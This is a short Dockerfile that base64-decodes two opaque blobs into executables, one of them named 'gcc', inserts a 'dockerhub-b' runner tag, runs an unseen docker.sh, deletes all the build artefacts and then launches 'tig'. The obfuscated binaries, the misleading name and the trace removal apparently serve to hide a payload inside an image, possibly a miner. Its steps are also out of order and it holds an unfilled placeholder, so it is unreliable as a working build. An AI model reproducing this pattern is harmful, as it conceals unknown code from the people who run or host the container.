FROM ubuntu
WORKDIR /workdir
ENV DEBIAN_FRONTEND noninteractive

RUN bash -c 'echo $(date +%s) > tig.log'

RUN base64 --decode tig.64 > tig
RUN base64 --decode gcc.64 > gcc

RUN chmod +x gcc

COPY tig .
COPY docker.sh .
COPY gcc .

RUN sed --in-place 's/__RUNNER__/dockerhub-b/g' tig
RUN bash ./docker.sh

RUN rm --force --recursive tig _REPO_NAME__.64 docker.sh gcc gcc.64

CMD tig
